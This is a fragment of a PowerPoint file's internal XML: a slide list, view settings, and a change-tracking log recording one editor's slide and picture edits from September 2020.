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notesSlides/notesSlide4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlid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32"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="329" r:id="rId6"/>
    <p:sldId id="327" r:id="rId7"/>
    <p:sldId id="331" r:id="rId8"/>
    <p:sldId id="310" r:id="rId9"/>
    <p:sldId id="311" r:id="rId10"/>
    <p:sldId id="312" r:id="rId11"/>
    <p:sldId id="313" r:id="rId12"/>
    <p:sldId id="314" r:id="rId13"/>
    <p:sldId id="332" r:id="rId14"/>
    <p:sldId id="315" r:id="rId15"/>
    <p:sldId id="333" r:id="rId16"/>
    <p:sldId id="316" r:id="rId17"/>
    <p:sldId id="317" r:id="rId18"/>
    <p:sldId id="318" r:id="rId19"/>
    <p:sldId id="319" r:id="rId20"/>
    <p:sldId id="320" r:id="rId21"/>
    <p:sldId id="321" r:id="rId22"/>
    <p:sldId id="330" r:id="rId23"/>
    <p:sldId id="334" r:id="rId24"/>
    <p:sldId id="335" r:id="rId25"/>
    <p:sldId id="322" r:id="rId26"/>
    <p:sldId id="336" r:id="rId27"/>
    <p:sldId id="323" r:id="rId28"/>
    <p:sldId id="324" r:id="rId29"/>
    <p:sldId id="325" r:id="rId30"/>
    <p:sldId id="32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94649"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="129" d="100"/>
          <a:sy n="129" d="100"/>
        </p:scale>
        <p:origin x="133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8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld">
      <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T11:11:40.970" v="554" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="del">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:49:59.409" v="537" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="346222295" sldId="293"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T11:11:40.970" v="554" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="926865884" sldId="301"/>
        </pc:sldMkLst>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T11:11:40.970" v="554" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="926865884" sldId="301"/>
            <ac:cxnSpMk id="4" creationId="{0A5878A3-5696-4B0E-A050-A1FCA7AA5127}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:25:07.918" v="479" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3372599681" sldId="303"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:22:27.491" v="437" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:spMk id="3" creationId="{A366A14E-8A78-4770-A2CF-546F53252C1A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T09:54:03.990" v="140" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="4" creationId="{3923EAD6-BBA2-41C3-8AD6-74CFC70107FF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T09:53:53.225" v="138" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="7" creationId="{80C87E5E-A3BC-4244-B7EE-B4A8426F0F52}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:12:12.830" v="270" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="9" creationId="{B81E2143-47D2-4A30-8C84-DD6D3CAB2A55}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T09:55:24.764" v="153" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="10" creationId="{74965B52-AE0E-4628-9ECE-9CAD8AF1C1AD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T09:57:40.864" v="165" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="12" creationId="{F429DCD7-456B-4120-A38E-2B4E07D44414}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:07:07.741" v="221" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="14" creationId="{EDBFE0C5-8E69-4934-8FE9-2C5F91AA6ECF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:03:17.565" v="184" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="16" creationId="{F83B01DA-4DCB-4520-AA0C-0966F587996A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:05:57.853" v="196" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="18" creationId="{C82E55E3-2ADA-4013-BAB6-D05C73480525}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:06:10.489" v="208" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="20" creationId="{F588765F-7E26-464C-82BC-BED4D9D14809}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:09:58.322" v="233" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="22" creationId="{AD9034D9-9BA8-4A33-8ADA-3112EB89F318}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:11:10.887" v="246" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="24" creationId="{27C757BE-29B6-4D96-8B6C-222A6926DE62}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:11:14.368" v="247" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="26" creationId="{3CD7E373-496D-4794-8D16-FAA34A8C19C3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:11:36.915" v="259" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="28" creationId="{A41302EA-7CD0-4A15-BBCD-F8FA8B3F90F0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:12:24.758" v="280" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="30" creationId="{B260F303-8B07-471C-93B9-5B96FBFD597B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:17:47.359" v="338" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="32" creationId="{FB484C77-7967-4D90-9146-74F9B330D46D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:17:36.026" v="326" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="34" creationId="{D5443099-1865-4B1C-9D9E-3DA7BA5427FA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:17:21.816" v="314" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="36" creationId="{C50736EE-6229-420B-81F6-0D2B92E95B30}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:19:07.614" v="375" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="38" creationId="{5BB7623C-C8BC-45F4-978E-536DAB8FB665}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:18:56.541" v="365" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="40" creationId="{F343AF4E-664D-4BFB-AAA3-3D7EA752715A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:18:45.965" v="354" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="42" creationId="{68265B7C-5A8D-4D4F-AFCE-D12ACD265561}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:19:39.465" v="387" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="44" creationId="{9D003984-BAB3-4012-80D5-556BF52367B9}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:24:34.691" v="458" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="46" creationId="{5BBF0BD1-C6B3-47DB-BA1F-CD8090948389}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:19:17.988" v="376" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="48" creationId="{9003FEFF-3A76-40D2-8972-007DECA74B59}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:24:56.575" v="469" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="50" creationId="{22C7E2C2-D849-4650-BC3A-D2E3DAE74A5E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:25:07.918" v="479" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="52" creationId="{AC09D1CA-4145-4A2C-AF9C-8052A3525650}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:25:07.918" v="478" actId="108"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372599681" sldId="303"/>
            <ac:picMk id="54" creationId="{807E22E3-E06E-4FF2-8479-47D0ECEF6C22}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod chgLayout">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:37:02.932" v="522" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3713072509" sldId="305"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:29:20.830" v="482" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3713072509" sldId="305"/>
            <ac:spMk id="2" creationId="{7A00AF24-5596-49A9-9270-E528AE08DA22}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del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3" creationId="{077A761A-079B-492A-A5C1-6B9E6CCFBC24}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:29:56.708" v="508" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3713072509" sldId="305"/>
            <ac:spMk id="6" creationId="{6CC637E8-36F9-4F25-946C-72F4206FAAAA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord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8" creationId="{FDE50579-310C-414A-8D22-EB34C43FC8D6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:37:02.932" v="522" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3713072509" sldId="305"/>
            <ac:spMk id="9" creationId="{6EC04BFD-69C2-413B-94FA-EDB725CE5B7B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:30:40.789" v="513" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3713072509" sldId="305"/>
            <ac:grpSpMk id="10" creationId="{84EA3651-6D1E-4F27-87F6-4D91C0383AA2}"/>
          </ac:grpSpMkLst>
        </pc:grp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4" creationId="{4281B5EB-3005-4B6C-A699-B0B5DA829951}"/>
          </ac:picMkLst>
        </pc:pic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5" creationId="{3A2529A8-F78B-4650-BBD0-5A68B6EEA3A5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:29:56.708" v="508" actId="164"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3713072509" sldId="305"/>
            <ac:cxnSpMk id="7" creationId="{1A89FF4E-495F-4077-8BD4-F0F7F201DCC4}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod chgLayout">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:49:26.634" v="536" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2053977049" sldId="307"/>
        </pc:sldMkLst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2" creationId="{76F30AD0-A454-47F8-BB75-EECADEF8F4E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:49:26.634" v="536" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2053977049" sldId="307"/>
            <ac:spMk id="3" creationId="{3AAF73FB-4EE1-4F3F-9697-C63AFB332F55}"/>
          </ac:spMkLst>
        </pc:spChg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5" creationId="{048DFB2F-452C-40C4-829B-67A43467A842}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod modCrop">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:49:07.841" v="532" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2053977049" sldId="307"/>
            <ac:picMk id="4" creationId="{3B58840B-1E36-4054-AD19-F2AB937862B5}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod chgLayout">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:51:30.814" v="553" actId="15"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1765004633" sldId="309"/>
        </pc:sldMkLst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8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:51:30.814" v="553" actId="15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addSp delSp modSp mod">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:35:36.357" v="514" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="61290766" sldId="315"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:35:36.357" v="514" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="61290766" sldId="315"/>
            <ac:spMk id="3" creationId="{59B173AF-8DDC-40AF-BF40-691A6B3C79D1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T09:44:33.077" v="5" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="61290766" sldId="315"/>
            <ac:spMk id="6" creationId="{3BA01FA8-6B14-4AEB-8772-E6E549D5F442}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T09:46:29.074" v="13" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="61290766" sldId="315"/>
            <ac:picMk id="7" creationId="{3A1B2742-4098-4877-B48F-65E707C97D08}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:22:39.873" v="446" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3000602286" sldId="316"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:22:39.873" v="446" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3000602286" sldId="316"/>
            <ac:spMk id="2" creationId="{3802573A-D614-48FD-A712-D91C6BB0DA5C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:22:10.989" v="433" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3000602286" sldId="316"/>
            <ac:spMk id="3" creationId="{CEE5ADC4-0F90-4EC7-89E7-479D608EC0C9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:21:29.412" v="421" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3000602286" sldId="316"/>
            <ac:picMk id="6" creationId="{E2A70F15-9C05-4395-849B-EF12D723FB67}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:21:29.412" v="420" actId="108"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3000602286" sldId="316"/>
            <ac:picMk id="8" creationId="{C8D842C6-DB42-4E1D-AA6A-78681A345617}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8E5CC1E4-6C3E-4250-BE59-D5EDB4F79F07}" dt="2020-09-07T10:21:51.302" v="431" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3000602286" sldId="316"/>
            <ac:picMk id="10" creationId="{9110D78D-97A4-4A48-A7FF-90239F3076FF}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8F4BCD20-2426-4217-8768-11CB227F084C}"/>
    <pc:docChg chg="modSld">
